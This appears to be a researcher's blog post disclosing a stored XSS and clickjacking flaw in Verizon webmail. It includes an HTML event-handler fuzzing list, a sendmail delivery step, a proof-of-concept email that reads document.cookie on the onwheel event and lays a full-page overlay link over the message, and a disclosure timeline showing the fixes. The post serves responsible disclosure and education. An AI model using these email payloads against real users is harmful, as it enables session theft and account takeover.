I’ve previously written about a server-side vulnerability in Verizon’s webmail client, but I thought it was also worth covering a couple of interesting client-side vulns I discovered that would’ve allowed an attacker to compromise a victim’s entire email account.
I started by attempting to identify the allowed HTML elements/attributes in the webmail client. Although there’s probably a better way to do this, I simply generated a list of all valid HTML elements along with all possible attributes for each. Here’s the link to the full file; a sample is included below:
<figure onafterprint="console.log(244599)" onbeforeprint="console.log(309354)" onbeforeunload="console.log(879813)" onerror="console.log(949564)" onhashchange="console.log(575242)" onload="console.log(301053)" onmessage="console.log(976974)" onoffline="console.log(796090)" ononline="console.log(432638)" onpagehide="console.log(504345)" onpageshow="console.log(696619)" onpopstate="console.log(398418)" onresize="console.log(943097)" onstorage="console.log(882233)" onunload="console.log(929443)" onblur="console.log(932104)" onchange="console.log(102339)" oncontextmenu="console.log(761265)" onfocus="console.log(188946)" oninput="console.log(143653)" oninvalid="console.log(304208)" onreset="console.log(318472)" onsearch="console.log(778420)" onselect="console.log(942035)" onsubmit="console.log(603589)" onkeydown="console.log(650647)" onkeypress="console.log(579383)" onkeyup="console.log(821763)" onclick="console.log(284098)" ondblclick="console.log(477370)" ondrag="console.log(439095)" ondragend="console.log(546684)" ondragenter="console.log(197257)" ondragleave="console.log(238440)" ondragover="console.log(783418)" ondragstart="console.log(773843)" ondrop="console.log(436878)" onmousedown="console.log(153386)" onmousemove="console.log(598217)" onmouseout="console.log(425628)" onmouseover="console.log(359441)" onmouseup="console.log(687310)" onmousewheel="console.log(823824)" onscroll="console.log(175565)" onwheel="console.log(595449)" oncopy="console.log(243603)" oncut="console.log(841770)" onpaste="console.log(489332)" onabort="console.log(516667)" oncanplay="console.log(329437)" oncanplaythrough="console.log(754238)" oncuechange="console.log(268702)" ondurationchange="console.log(455721)" onemptied="console.log(923165)" onended="console.log(330716)" onerror="console.log(382133)" onloadeddata="console.log(268470)" onloadedmetadata="console.log(934963)" onloadstart="console.log(664605)" onpause="console.log(957774)" onplay="console.log(750548)" onplaying="console.log(887438)" onprogress="console.log(648208)" onratechange="console.log(742465)" onseeked="console.log(559902)" onseeking="console.log(296937)" onstalled="console.log(613468)" onsuspend="console.log(651399)" ontimeupdate="console.log(993291)" onvolumechange="console.log(508203)" onwaiting="console.log(146149)" onerror="console.log(470459)" onshow="console.log(586099)" ontoggle="console.log(739568)" accesskey="test3617" class="test3617" contenteditable="test3617" contextmenu="test3617" data-nent="test3617" dir="test3617" draggable="test3617" dropzone="test3617" hidden="test3617" id="test3617" lang="test3617" spellcheck="test3617" style="display:block" tabindex="test3617" title="test3617" translate="test3617">Test</figure> <footer onafterprint="console.log(244599)" onbeforeprint="console.log(309354)" onbeforeunload="console.log(879813)" onerror="console.log(949564)" onhashchange="console.log(575242)" onload="console.log(301053)" onmessage="console.log(976974)" onoffline="console.log(796090)" ononline="console.log(432638)" onpagehide="console.log(504345)" onpageshow="console.log(696619)" onpopstate="console.log(398418)" onresize="console.log(943097)" onstorage="console.log(882233)" onunload="console.log(929443)" onblur="console.log(932104)" onchange="console.log(102339)" oncontextmenu="console.log(761265)" onfocus="console.log(188946)" oninput="console.log(143653)" oninvalid="console.log(304208)" onreset="console.log(318472)" onsearch="console.log(778420)" onselect="console.log(942035)" onsubmit="console.log(603589)" onkeydown="console.log(650647)" onkeypress="console.log(579383)" onkeyup="console.log(821763)" onclick="console.log(284098)" ondblclick="console.log(477370)" ondrag="console.log(439095)" ondragend="console.log(546684)" ondragenter="console.log(197257)" ondragleave="console.log(238440)" ondragover="console.log(783418)" ondragstart="console.log(773843)" ondrop="console.log(436878)" onmousedown="console.log(153386)" onmousemove="console.log(598217)" onmouseout="console.log(425628)" onmouseover="console.log(359441)" onmouseup="console.log(687310)" onmousewheel="console.log(823824)" onscroll="console.log(175565)" onwheel="console.log(595449)" oncopy="console.log(243603)" oncut="console.log(841770)" onpaste="console.log(489332)" onabort="console.log(516667)" oncanplay="console.log(329437)" oncanplaythrough="console.log(754238)" oncuechange="console.log(268702)" ondurationchange="console.log(455721)" onemptied="console.log(923165)" onended="console.log(330716)" onerror="console.log(382133)" onloadeddata="console.log(268470)" onloadedmetadata="console.log(934963)" onloadstart="console.log(664605)" onpause="console.log(957774)" onplay="console.log(750548)" onplaying="console.log(887438)" onprogress="console.log(648208)" onratechange="console.log(742465)" onseeked="console.log(559902)" onseeking="console.log(296937)" onstalled="console.log(613468)" onsuspend="console.log(651399)" ontimeupdate="console.log(993291)" onvolumechange="console.log(508203)" onwaiting="console.log(146149)" onerror="console.log(470459)" onshow="console.log(586099)" ontoggle="console.log(739568)" accesskey="test3617" class="test3617" contenteditable="test3617" contextmenu="test3617" data-nent="test3617" dir="test3617" draggable="test3617" dropzone="test3617" hidden="test3617" id="test3617" lang="test3617" spellcheck="test3617" style="display:block" tabindex="test3617" title="test3617" translate="test3617">Test</footer>
Next, I sent an HTML email to my own Verizon address using the payload above as the body:
[user@rw verizon-poc]$ head email.txt | less Content-Type: text/html; Subject: Testing the new email <a onafterprint="console.log(244599)" onbeforeprint="console.log(309354)" onbeforeunload="console.log(879813)" onerror="console.log(949564)" onhashchange="console.log(575242)" onload="console.log(301053)" onmessage="console.log(976974)" onoffline="console.log(796090)" ononline="console.log(432638)" onpagehide="console.log(504345)" onpageshow="console.log(696619)" onpopstate="console.log(398418)" onresize="console.log(943097)" onstorage="console.log(882233)" onunload="console.log(929443)" onblur="console.log(932104)" onchange="console.log(102339)" oncontextmenu="console.log(761265)" onfocus="console.log(188946)" oninput="console.log(143653)" oninvalid="console.log(304208)" onreset="console.log(318472)" onsearch="console.log(778420)">Test</a> <!-- Snipped -->
[user@rw verizon-poc]$ sendmail -t ***REMOVED***@verizon.net < ./email.txt
After it sent, I logged into webmail and opened the message:
I then opened up Chrome’s dev console and started looking over the rendered HTML elements/attributes. I immediately noticed a few interesting attributes that made it through unfiltered, the most severe of which were onwheel and oninput. I also noticed that the style attribute was left unfiltered which would’ve allowed clickjacking and other kinds of malicious UI redressing.
To confirm/demonstrate exploitability, I put together a PoC containing a payload leveraging both vulnerabilities:
Content-Type: text/html; Subject: PoC Verizon Webmail PoC - Move scrollwheel to trigger the XSS payload. Note the overlay anchor that also demonstrates the clickjacking vulnerability. <a href="https://en.wikipedia.org/wiki/Clickjacking" onwheel="alert(document.cookie)" style="position:fixed;top:0;left:0;width:100%;height:100%;"></a> <br> <br> <!-- Snipped --> <br> <br> <br> <div style="font-size:72px"> An interesting message here to entice the user to scroll down. </div> <br> <br> <br> <!-- Snipped --> <br> <br>
I emailed myself the new payload and opened it in webmail. Here’s a look at the XSS payload being triggered:
Also, note the style attribute on the anchor above which effectively turns it into an overlay covering the entire clickable page. This means that regardless of whether the XSS payload is triggered by moving the mouse wheel, the anchor element’s overlay all but guarantees the user will unsuspectingly click on an attacker-controlled link.
Disclosure
| 2016-03-28 | Vuln reported to Verizon, PoC sent |
| 2016-04-21 | XSS vuln patched, waiting on clickjacking |
| 2016-04-21 | I recommend restricting style attribute directives to mitigate clickjacking |
| 2016-04-25 | Clickjacking vuln patched |
Persistent XSS in email clients can be dangerous, largely due to the payload’s direct delivery to the victim while also assuring he is authenticated prior to its execution. While a lot of XSS vulns require some legwork to exploit, this vuln only required the victim open a specifically crafted email (and scroll the mouse wheel) in order to execute the malicious payload. This, combined with the additional clickjacking vuln, made for a simple (and effective) attack scenario.
Share this:
